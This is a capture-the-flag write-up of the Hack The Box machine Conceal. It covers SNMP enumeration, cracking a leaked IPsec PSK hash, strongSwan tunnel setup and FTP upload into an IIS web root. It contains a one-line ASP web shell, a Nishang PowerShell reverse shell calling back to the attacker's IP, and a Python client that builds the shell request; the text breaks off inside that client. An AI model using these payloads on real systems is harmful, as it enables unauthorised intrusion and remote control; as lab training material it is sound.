Hack The Box Writeup – Conceal

This box covers SNMP enumeration, an IPsec tunnel that has to be built before any TCP service is even reachable, and ends with a Juicy Potato privilege escalation on Windows. Overall a really fun box with a lot of learning opportunities.

We start off by running masscan. I am beginning to like this approach for my initial recon: run it first across all TCP and UDP ports, identify what is open, then run targeted nmap scans against just those ports.

root@kali:~/htb/conceal# masscan -p1-65535,U:1-65535 10.10.10.116 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-19 00:57:57 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.116 

Interestingly, only UDP 161 shows up; the usual TCP suspects are hidden (CONCEAL, ha!). Keep in mind that masscan only reports a UDP port when the service answers its probe, and it only carries probes for well-known UDP services, so an empty UDP result never proves a port is closed. Let’s run nmap on 161 and see what we find.

root@kali:~/htb/conceal# nmap -sV -sU -p161 10.10.10.116
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-18 21:15 EDT
Nmap scan report for 10.10.10.116
Host is up (0.038s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
Service Info: Host: Conceal

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

Further SNMP enumeration can be done with nmap’s -sC option (or --script "snmp-*"), with snmpwalk, or with snmp-check. I like snmp-check because of the neat display of the output. Everything below comes from the default "public" community string.

root@kali:~/htb/conceal# snmp-check 10.10.10.116
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.116
  Hostname                      : Conceal
  Description                   : Hardware: Intel64 Family 6 Model 63 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  Location                      : -
  Uptime snmp                   : 01:19:22.29
  Uptime system                 : 01:18:56.02
  System date                   : 2019-5-19 02:06:31.1
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  Destitute           
  Administrator       
  DefaultAccount      

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 128
  TCP segments received         : 148118
  TCP segments sent             : 8
  TCP segments retrans          : 4
  Input datagrams               : 456305
  Delivered datagrams           : 374282
  Output datagrams              : 1672

[*] Network interfaces:

  Interface                     : [ up ] Software Loopback Interface 1
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 1073 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IKEv2)
  Id                            : 2
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (PPTP)
  Id                            : 3
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  Id                            : 4
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (L2TP)
  Id                            : 5
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Teredo Tunneling Pseudo-Interface
  Id                            : 6
  Mac Address                   : 00:00:00:00:00:00
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IP)
  Id                            : 7
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (SSTP)
  Id                            : 8
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IPv6)
  Id                            : 9
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection
  Id                            : 10
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853

  Interface                     : [ down ] WAN Miniport (PPPOE)
  Id                            : 11
  Mac Address                   : :::::
  Type                          : ppp
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (Network Monitor)
  Id                            : 12
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000
  Id                            : 13
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000
  Id                            : 14
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000
  Id                            : 15
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  10                    10.10.10.116          255.255.255.0         1                   
  1                     127.0.0.1             255.0.0.0             1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               281                 
  10.10.10.0            10.10.10.116          255.255.255.0         281                 
  10.10.10.116          10.10.10.116          255.255.255.255       281                 
  10.10.10.255          10.10.10.116          255.255.255.255       281                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          63250               
  127.0.0.1             1900                
  127.0.0.1             63251               

[*] Network services:

  Index                 Name                
  0                     Power               
  1                     Server              
  2                     Themes              
  3                     IP Helper           
  4                     DNS Client          
  5                     Data Usage          
  6                     Superfetch          
  7                     DHCP Client         
  8                     Time Broker         
  9                     TokenBroker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    VMware Tools        
  14                    Windows Time        
  15                    CoreMessaging       
  16                    Plug and Play       
  17                    Print Spooler       
  18                    Windows Audio       
  19                    SSDP Discovery      
  20                    Task Scheduler      
  21                    Windows Search      
  22                    Security Center     
  23                    Storage Service     
  24                    Windows Firewall    
  25                    CNG Key Isolation   
  26                    COM+ Event System   
  27                    Windows Event Log   
  28                    IPsec Policy Agent  
  29                    Geolocation Service 
  30                    Group Policy Client 
  31                    RPC Endpoint Mapper 
  32                    Data Sharing Service
  33                    Device Setup Manager
  34                    Network List Service
  35                    System Events Broker
  36                    User Profile Service
  37                    Base Filtering Engine
  38                    Local Session Manager
  39                    Microsoft FTP Service
  40                    TCP/IP NetBIOS Helper
  41                    Cryptographic Services
  42                    COM+ System Application
  43                    Diagnostic Service Host
  44                    Shell Hardware Detection
  45                    State Repository Service
  46                    Diagnostic Policy Service
  47                    Network Connection Broker
  48                    Security Accounts Manager
  49                    Network Location Awareness
  50                    Windows Connection Manager
  51                    Windows Font Cache Service
  52                    Remote Procedure Call (RPC)
  53                    DCOM Server Process Launcher
  54                    Windows Audio Endpoint Builder
  55                    Application Host Helper Service
  56                    Network Store Interface Service
  57                    Client License Service (ClipSVC)
  58                    Distributed Link Tracking Client
  59                    System Event Notification Service
  60                    World Wide Web Publishing Service
  61                    Connected Devices Platform Service
  62                    Windows Defender Antivirus Service
  63                    Windows Management Instrumentation
  64                    Windows Process Activation Service
  65                    Distributed Transaction Coordinator
  66                    IKE and AuthIP IPsec Keying Modules
  67                    Microsoft Account Sign-in Assistant
  68                    VMware CAF Management Agent Service
  69                    VMware Physical Disk Helper Service
  70                    Background Intelligent Transfer Service
  71                    Background Tasks Infrastructure Service
  72                    Program Compatibility Assistant Service
  73                    VMware Alias Manager and Ticket Service
  74                    Connected User Experiences and Telemetry
  75                    WinHTTP Web Proxy Auto-Discovery Service
  76                    Windows Defender Security Centre Service
  77                    Windows Push Notifications System Service
  78                    Windows Defender Antivirus Network Inspection Service
  79                    Windows Driver Foundation - User-mode Driver Framework

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  312                   running               smss.exe                                                        
  348                   running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted
  384                   running               svchost.exe           C:\Windows\system32\  -k LocalService     
  392                   running               csrss.exe                                                       
  468                   running               wininit.exe                                                     
  484                   running               csrss.exe                                                       
  564                   running               winlogon.exe                                                    
  584                   running               services.exe                                                    
  616                   running               lsass.exe             C:\Windows\system32\                      
  700                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch       
  712                   running               fontdrvhost.exe                                                 
  720                   running               fontdrvhost.exe                                                 
  820                   running               svchost.exe           C:\Windows\system32\  -k RPCSS            
  908                   running               dwm.exe                                                         
  960                   running               svchost.exe           C:\Windows\system32\  -k netsvcs          
  968                   running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork
  1008                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1036                  running               svchost.exe           C:\Windows\System32\  -k NetworkService   
  1100                  running               vmacthlp.exe          C:\Program Files\VMware\VMware Tools\                      
  1252                  running               Memory Compression                                              
  1288                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1372                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1384                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted
  1468                  running               spoolsv.exe           C:\Windows\System32\                      
  1528                  running               svchost.exe           C:\Windows\system32\  -k appmodel         
  1700                  running               svchost.exe           C:\Windows\system32\  -k apphost          
  1708                  running               svchost.exe           C:\Windows\System32\  -k utcsvc           
  1720                  running               svchost.exe           C:\Windows\system32\  -k ftpsvc           
  1764                  running               svchost.exe           C:\Windows\system32\  -k LocalSystemNetworkRestricted
  1804                  running               SecurityHealthService.exe                                            
  1812                  running               snmp.exe              C:\Windows\System32\                      
  1844                  running               VGAuthService.exe     C:\Program Files\VMware\VMware Tools\VMware VGAuth\                      
  1864                  running               vmtoolsd.exe          C:\Program Files\VMware\VMware Tools\                      
  1884                  running               ManagementAgentHost.exe  C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\                      
  1928                  running               svchost.exe           C:\Windows\system32\  -k iissvcs          
  1940                  running               MsMpEng.exe                                                     
  1980                  running               msdtc.exe             C:\Windows\System32\                      
  2144                  running               SearchIndexer.exe     C:\Windows\system32\  /Embedding          
  2580                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted
  2856                  running               SearchProtocolHost.exe  C:\Windows\system32\  Global\UsGthrFltPipeMssGthrPipe13_ Global\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 "Software\Microsoft\Windows Search" "Moz
  2904                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      
  3020                  running               dllhost.exe           C:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
  3064                  running               LogonUI.exe                                 /flags:0x0 /state0:0xa3a36855 /state1:0x41c64e6d
  3140                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceAndNoImpersonation
  3220                  running               NisSrv.exe                                                      
  3760                  running               svchost.exe                                                     
  3880                  running               SearchFilterHost.exe  C:\Windows\system32\  0 700 704 712 8192 708

[*] Storage information:

  Description                   : ["C:\\ Label:  Serial Number 9606be7b"]
  Device id                     : [#<SNMP::Integer:0x01f70cb4 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x020abdb8 @value=4096>]
  Memory size                   : 59.51 GB
  Memory used                   : 10.62 GB

  Description                   : ["D:\\"]
  Device id                     : [#<SNMP::Integer:0x020a9158 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x020a8280 @value=0>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes

  Description                   : ["Virtual Memory"]
  Device id                     : [#<SNMP::Integer:0x0209d6a0 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0209c73c @value=65536>]
  Memory size                   : 3.12 GB
  Memory used                   : 773.00 MB

  Description                   : ["Physical Memory"]
  Device id                     : [#<SNMP::Integer:0x02099b68 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x02098c18 @value=65536>]
  Memory size                   : 2.00 GB
  Memory used                   : 665.50 MB


[*] File system information:

  Index                         : 1
  Mount point                   : 
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 0

[*] Device information:

  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Microsoft Shared Fax Driver
  4                     unknown               running               Unknown Processor Type
  5                     unknown               running               Unknown Processor Type
  6                     unknown               unknown               Software Loopback Interface 1
  7                     unknown               unknown               WAN Miniport (IKEv2)
  8                     unknown               unknown               WAN Miniport (PPTP) 
  9                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  10                    unknown               unknown               WAN Miniport (L2TP) 
  11                    unknown               unknown               Teredo Tunneling Pseudo-Interface
  12                    unknown               unknown               WAN Miniport (IP)   
  13                    unknown               unknown               WAN Miniport (SSTP) 
  14                    unknown               unknown               WAN Miniport (IPv6) 
  15                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection
  16                    unknown               unknown               WAN Miniport (PPPOE)
  17                    unknown               unknown               WAN Miniport (Network Monitor)
  18                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer
  19                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-
  20                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer L
  21                    unknown               unknown               D:\                 
  22                    unknown               running               Fixed Disk          
  23                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)

[*] Software components:

  Index                 Name                
  1                     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  2                     VMware Tools        
  3                     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

[*] IIS server information:

  TotalBytesSentLowWord         : 0
  TotalBytesReceivedLowWord     : 0
  TotalFilesSent                : 0
  CurrentAnonymousUsers         : 0
  CurrentNonAnonymousUsers      : 0
  TotalAnonymousUsers           : 0
  TotalNonAnonymousUsers        : 0
  MaxAnonymousUsers             : 0
  MaxNonAnonymousUsers          : 0
  CurrentConnections            : 0
  MaxConnections                : 0
  ConnectionAttempts            : 0
  LogonAttempts                 : 0
  Gets                          : 0
  Posts                         : 0
  Heads                         : 0
  Others                        : 0
  CGIRequests                   : 0
  BGIRequests                   : 0
  NotFoundErrors                : 0

Looking closely at the output, under System information > Contact we see IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43. That brings us to the next phase: IPsec tunnels. This was something really new to me; the video in the reference section right at the end of the blog helped me understand it. IKE (Internet Key Exchange) is the protocol that negotiates the security associations (SAs) used to build an IPsec tunnel between the client and the server. What we need to set up the tunnel is the pre-shared key (PSK). The value in the contact field is not the PSK itself: it is 32 hex characters, the size of an MD5 digest, so it is a hash of the PSK that has to be cracked with hashcat (-m 0) or an online lookup service. Once cracked the password turns out to be Dudecake1!. Next we need the IKE proposal the server accepts, which ike-scan will tell us.
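The cracking step above, as an added example that is not part of the original writeup: it treats the leaked value as an unsalted digest, picks candidate algorithms from the digest length (32 hex characters means MD5), and tries each word of a wordlist. The DEMO_WORDLIST is constructed for the demo; on a real engagement point load_wordlist at rockyou.txt.

```python
"""Recover the IPsec PSK from the digest leaked in SNMP sysContact.

Added example (not from the original writeup). The digest is treated as an
unsalted hash of the PSK; the algorithm is guessed from its hex length.
"""
import hashlib

# The value from the SNMP sysContact field on the page.
LEAKED_DIGEST = "9C8B1A372B1878851BE2C097031B6E43"

# Unsalted digest algorithms, keyed by hex-digit length of their output.
ALGOS_BY_LEN = {
    32: ("md5",),
    40: ("sha1",),
    64: ("sha256",),
    128: ("sha512",),
}

# Constructed demo wordlist: a few junk entries plus the real answer.
DEMO_WORDLIST = ["password", "Conceal", "dudecake", "Dudecake1", "Dudecake1!"]


def digest_of(algo, word):
    """Hex digest of a candidate word under one unsalted algorithm."""
    return hashlib.new(algo, word.encode("utf-8")).hexdigest()


def candidate_algorithms(digest_hex):
    """Return the unsalted hashes whose output has this many hex digits."""
    digest_hex = digest_hex.strip()
    if not digest_hex or any(c not in "0123456789abcdefABCDEF" for c in digest_hex):
        raise ValueError("not a hex digest")
    return ALGOS_BY_LEN.get(len(digest_hex), ())


def load_wordlist(path):
    """Yield words from a wordlist file; latin-1 tolerates rockyou's odd bytes."""
    with open(path, "r", encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


def crack_digest(digest_hex, wordlist):
    """Try every (algorithm, word) pair; return (algo, word) or None."""
    target = digest_hex.strip().lower()
    words = list(wordlist)            # the list is reused once per algorithm
    for algo in candidate_algorithms(target):
        for word in words:
            if digest_of(algo, word) == target:
                return algo, word
    return None


if __name__ == "__main__":
    hit = crack_digest(LEAKED_DIGEST, DEMO_WORDLIST)
    print(hit or "no match: not an unsalted digest of any word in the list")
```

If nothing matches, the value is not a plain digest of a word in the list (salted, iterated, or not a hash at all), which is exactly the signal to stop guessing and look for another source of the key.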

root@kali:~/htb/conceal# ike-scan -M 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116	Main Mode Handshake returned
	HDR=(CKY-R=206141060fff3765)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
	VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
	VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
	VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
	VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
	VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
	VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.056 seconds (17.74 hosts/sec).  1 returned handshake; 0 returned notify

Look at the SA line. It tells us the encryption algorithm (3DES), hash (SHA1), Diffie-Hellman group (2, modp1024), authentication method (PSK) and SA lifetime (0x7080 = 28800 seconds) the server proposes, and the first vendor ID fingerprints it as a Windows IKEv1 responder. Our client proposal has to match these exactly or phase 1 fails. Now let’s set up strongSwan on Kali. I used the typical apt-get install strongswan. More details can be found here. Once installed, edit the /etc/ipsec.conf configuration file by adding the conn block below; the comments map each setting back to the ike-scan output.

conn conceal
	# Auth=PSK in the ike-scan SA line
	authby=psk
	# bring the tunnel up as soon as the daemon starts
	auto=start
	# phase 2 (ESP) proposal
	esp=3des-sha1
	# phase 1 proposal: Enc=3DES Hash=SHA1 Group=2:modp1024
	ike=3des-sha1-modp1024
	# the host answered a Main Mode handshake, i.e. IKEv1
	keyexchange=ikev1
	# host-to-host transport mode, no inner subnet
	type=transport
	right=10.10.10.116
	# traffic selector: only TCP to the target is carried inside the SA
	rightsubnet=10.10.10.116[tcp/]

Then we edit the /etc/ipsec.secrets file and add the PSK we recovered from the hash earlier (keep this file readable by root only).

10.10.10.116 : PSK "Dudecake1!"

Now let’s start the ipsec service and check the status. We should see an ESTABLISHED IKE SA and an INSTALLED transport-mode child SA between our Kali box and the target. Note the [tcp] on the last status line: only TCP is carried inside ESP, so a ping or UDP probe says nothing about whether the tunnel works.

root@kali:~/htb/conceal# ipsec start
 Starting strongSwan 5.7.2 IPsec [starter]…
 root@kali:~/htb/conceal# ipsec status
 Security Associations (1 up, 0 connecting):
      conceal[1]: ESTABLISHED 3 seconds ago, 10.10.14.23[10.10.14.23]…10.10.10.116[10.10.10.116]
      conceal{1}:  INSTALLED, TRANSPORT, reqid 1, ESP SPIs: c5bc3e98_i 219e450c_o
      conceal{1}:   10.10.14.23/32 === 10.10.10.116/32[tcp]

It’s now time to go back to the snmp-check output (TCP connections and listening ports) to see what the host itself says is listening: 21, 80, 135, 139, 445 and a handful of RPC ports from 49664 up. None of them answered masscan because the host’s IPsec policy requires ESP for TCP; now that we have the tunnel they should be reachable. If you re-scan, use a full connect scan (nmap -sT) so the probes pass through the kernel’s IPsec policy; a raw-socket SYN scan may be sent outside it and show nothing. From that list let’s try port 21 and port 80. We have anonymous FTP access and a web page served by IIS.
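Turning the snmp-check listing into a targeted scan, as an added example that is not part of the original writeup: the parser reads the two listening-port sections of snmp-check’s text output and builds a connect-scan nmap command from them. SAMPLE_SNMP_CHECK is a constructed excerpt in the same layout as the output above, including one established connection and loopback-only sockets that must be ignored.

```python
"""Extract listening ports from snmp-check output and build an nmap command.

Added example (not from the original writeup). Uses the host's own view of
its sockets, which is what masscan could not see through the IPsec policy.
"""
import re

SECTION_RE = re.compile(r"^\[\*\] (.+?):\s*$")
# TCP table row: local addr, local port, remote addr, remote port, state
TCP_ROW_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+\S+\s+\d+\s+(\w+)\s*$")
# UDP table row: local addr, local port
UDP_ROW_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s*$")

# Constructed excerpt in snmp-check's layout (not the full output above).
SAMPLE_SNMP_CHECK = """\
[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State
  0.0.0.0               21                    0.0.0.0               0                     listen
  0.0.0.0               80                    0.0.0.0               0                     listen
  0.0.0.0               135                   0.0.0.0               0                     listen
  0.0.0.0               445                   0.0.0.0               0                     listen
  0.0.0.0               49664                 0.0.0.0               0                     listen
  10.10.10.116          139                   0.0.0.0               0                     listen
  10.10.10.116          49673                 10.10.14.23           443                   established

[*] Listening UDP ports:

  Local address         Local port
  0.0.0.0               123
  0.0.0.0               161
  0.0.0.0               500
  0.0.0.0               4500
  10.10.10.116          137
  10.10.10.116          1900
  127.0.0.1             1900
  127.0.0.1             63251

[*] Network services:
"""


def parse_listening_ports(text):
    """Return {'tcp': set(), 'udp': set()} of ports bound on non-loopback addresses."""
    ports = {"tcp": set(), "udp": set()}
    section = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        if section == "TCP connections and listening ports":
            m = TCP_ROW_RE.match(line)
            if m and m.group(3) == "listen" and not m.group(1).startswith("127."):
                ports["tcp"].add(int(m.group(2)))
        elif section == "Listening UDP ports":
            m = UDP_ROW_RE.match(line)
            if m and not m.group(1).startswith("127."):
                ports["udp"].add(int(m.group(2)))
    return ports


def nmap_command(target, ports):
    """Build a connect scan (-sT): it goes through the kernel IPsec policy."""
    scans, spec = ["-sT"], []
    if ports["tcp"]:
        spec.append("T:" + ",".join(str(p) for p in sorted(ports["tcp"])))
    if ports["udp"]:
        scans.append("-sU")
        spec.append("U:" + ",".join(str(p) for p in sorted(ports["udp"])))
    return "nmap {} -sV -p {} {}".format(" ".join(scans), ",".join(spec), target)


if __name__ == "__main__":
    found = parse_listening_ports(SAMPLE_SNMP_CHECK)
    print(nmap_command("10.10.10.116", found))
```

In practice you pipe the real snmp-check output into parse_listening_ports; the only thing that changes is the port lists.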

root@kali:~/htb/conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> 

Next up, let’s run gobuster against the web root to see what we can find.

root@kali:~/htb/conceal# gobuster -u http://10.10.10.116 -w /usr/share/wordlists/dirb/common.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.116/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/18 21:42:17 Starting gobuster
=====================================================
/upload (Status: 301)
=====================================================
2019/05/18 21:43:00 Finished
=====================================================

Aha! An upload directory. Let’s upload a text file via FTP and see whether it shows up under /upload in the browser; if it does, the anonymous FTP root is inside the IIS web root.

root@kali:~/htb/conceal# echo "test upload" > test.txt
root@kali:~/htb/conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (93.3479 kB/s)
ftp> 

Success! Now we can craft a simple ASP web shell, drop it in the same place, browse to it under /upload and use it to get a reverse shell back to our Kali box. Before that, an interesting thing to note: when we browse to something that does not exist, the IIS error page reveals the physical path of the web root (look at the Physical Path label in the error page). That is how we know where the uploaded files land on disk.

Let’s upload a simple classic ASP shell that gives us command execution through the cmd query parameter. It can be a single line:

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

This gives us basic RCE where we can do stuff like http://10.10.10.116/upload/shell.asp?cmd=hostname

Now for our reverse shell, let’s use the popular PowerShell reverse shell Invoke-PowerShellTcp from Nishang (in the Shells folder of the Nishang GitHub repository). Append the line Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.23 -Port 443 to the end of that file so the function is invoked as soon as the script is loaded. Upload our ASP shell and this updated PowerShell script over FTP, start a netcat listener on port 443, and browse to http://10.10.10.116/upload/shell.asp?cmd=cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\inetpub\wwwroot\upload\Invoke-PowerShellTcp.ps1 [Don’t forget to URL-encode the cmd param value.] The browser request will hang for as long as the reverse shell is alive, because the ASP shell waits for the process to exit before returning its output; that is expected. And yay! you have a shell!

root@kali:~/htb/conceal# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.116] 49673
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
PS C:\Users\destitute\Desktop> type c:\Users\destitute\Desktop\proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
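A small client for the one-line ASP shell, added here as an example and not part of the original write-up: it percent-encodes the cmd value (the step the text says not to forget) and shows why a reverse-shell command never "returns" to the browser. The URL, IP and file paths are the ones used in the write-up; everything else is an assumption of the example.

```python
"""Client for the one-line ASP web shell used above (added example).

Assumes the shell is reachable at http://10.10.10.116/upload/shell.asp as in
the write-up; the IP, port and paths below are taken from the write-up.
"""
import socket
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

SHELL_URL = "http://10.10.10.116/upload/shell.asp"  # from the write-up
REV_SHELL_CMD = (
    r"cmd.exe /c powershell -ExecutionPolicy Bypass "
    r"-File C:\inetpub\wwwroot\upload\Invoke-PowerShellTcp.ps1"
)


def build_url(shell_url: str, cmd: str) -> str:
    """Return the shell URL with cmd percent-encoded as a query value.

    safe='' makes quote() encode spaces, slashes, colons and backslashes as
    well; pasting the raw command into the address bar leaves "/c" and
    "C:\\" to be mangled by the browser or the query-string parser.
    """
    return f"{shell_url}?cmd={urllib.parse.quote(cmd, safe='')}"


def run_cmd(shell_url: str, cmd: str, timeout: float = 10.0) -> Optional[str]:
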